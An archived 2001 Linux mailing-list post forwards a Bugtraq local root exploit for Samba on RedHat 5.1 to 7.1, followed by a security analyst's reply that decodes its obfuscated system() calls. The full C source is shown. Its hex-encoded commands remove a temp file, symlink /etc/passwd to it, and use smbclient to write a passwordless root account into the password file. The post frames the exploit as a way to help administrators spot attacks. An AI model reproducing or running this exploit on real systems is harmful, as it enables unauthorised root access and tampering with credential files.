update for samba server exploit -> Re: samba server exploit

To: <tlug@example.com>
Subject: update for samba server exploit -> Re: samba server exploit
From: "roy lo" <roylo@example.com>
Date: Thu, 25 Oct 2001 20:56:29 -0700
Content-type: multipart/alternative;boundary="----=_NextPart_000_0014_01C15D97.84EC2D40"
Delivered-to: tlug@example.com
List-help: <mailto:tlug-request@example.comsubject=help>
List-post: <mailto:tlug@example.com>
List-subscribe: <mailto:tlug-request@example.comsubject=subscribe>
List-unsubscribe: <mailto:tlug-request@example.comsubject=unsubscribe>
Old-return-path: <roylo@example.com>
References: <003d01c15db1$6b85a600$0200a8c0@example.com>
Reply-to: tlug@example.com
Resent-from: tlug@example.com
Resent-message-id: <AA9K.A.ZL.a6N27@example.com>
Resent-sender: tlug-request@example.com

update for samba server exploit

"
Hey,

There is some confusion about the Samba exploit. It is an obfuscated
exploit for an old vulnerability in the Samba daemon. Before approving it
to the list, I checked it.

The system() calls:

system(inject1, 0);
system(inject2, 0);
system(inject3a, 0);

Try this:

printf("%s\n%s\n%s\n",inject1,inject2,inject3a);

output:

/bin/rm -rf /tmp/x.log
/bin/ln -s /etc/passwd /tmp/x.log
/usr/bin/smbclient //localhost/"

fd::0:0::/:/bin/sh\n" -n ../../../tmp/x -N

I am not sure why they chose to write the exploit this way.

Regards,

Dave Ahmad
SecurityFocus
www.securityfocus.com"

----- Original Message -----

From: roy lo

To: tlug@example.com

Sent: Thursday, October 25, 2001 5:01 PM

Subject: samba server exploit

saw this on bugtraq today,

I know some of you run samba servers, so hopfully this will help you to identity the problem in the event of an attack.

/*
* Samba Server r00t exploit
*
* Scope: Local (this exploit) and posible remote if conditions are given.
* Vuln:
*      RedHat 5.1
*      RedHat 5.2
*      RedHat 6.0
*      RedHat 6.1
*      RedHat 6.2
*      RedHat 7.0
*      RedHat 7.1
*      I don't know if other versions are vulnerable too.
*
* Run this exploit and then take a look at your passwd file.
* Run: ./samba-exp user
*
* Author:      Gabriel Maggiotti
* Email:       gmaggiot@example.com
* Webpage:     http://qb0x.net
*/

#include <stdio.h>
#include <string.h>

int main(int argc,char *argv[])
{
char inject1[]=
        "\x2f\x62\x69\x6e\x2f\x72\x6d\x20\x2d\x72\x66\x20\x2f"
        "\x74\x6d\x70\x2f\x78\x2e\x6c\x6f\x67";
char inject2[]=
        "\x2f\x62\x69\x6e\x2f\x6c\x6e\x20\x2d\x73\x20\x2f\x65"
        "\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x20\x2f\x74\x6d"
        "\x70\x2f\x78\x2e\x6c\x6f\x67";
char inject3a[100]=
        "\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x73\x6d\x62\x63"
        "\x6c\x69\x65\x6e\x74\x20\x2f\x2f\x6c\x6f\x63\x61\x6c"
        "\x68\x6f\x73\x74\x2f\x22\xa\xa";
char inject3b[]=
        "\x3a\x3a\x30\x3a\x30\x3a\x3a\x2f\x3a\x2f\x62\x69\x6e"
        "\x2f\x73\x68\x5c\x6e\x22\x20\x2d\x6e\x20\x2e\x2e\x2f"
        "\x2e\x2e\x2f\x2e\x2e\x2f\x74\x6d\x70\x2f\x78\x20\x2d"
        "\x4e\xa";

if(argc!=2){
        fprintf(stderr,"usage: %s <user>\n",*argv);
        return 1;
        }
strcat(inject3a,argv[1]);
strcat(inject3a,inject3b);
system(inject1, 0);
system(inject2, 0);
system(inject3a, 0);
return 0;
}

References:
- samba server exploit
  - From: "roy lo" <roylo@example.com>

Prev by Date: samba server exploit
Next by Date: Re: milestone 0.9
Previous by thread: samba server exploit
Next by thread: fetchmail monitor option
Index(es):
- Date
- Thread

Home | Main Index | Thread Index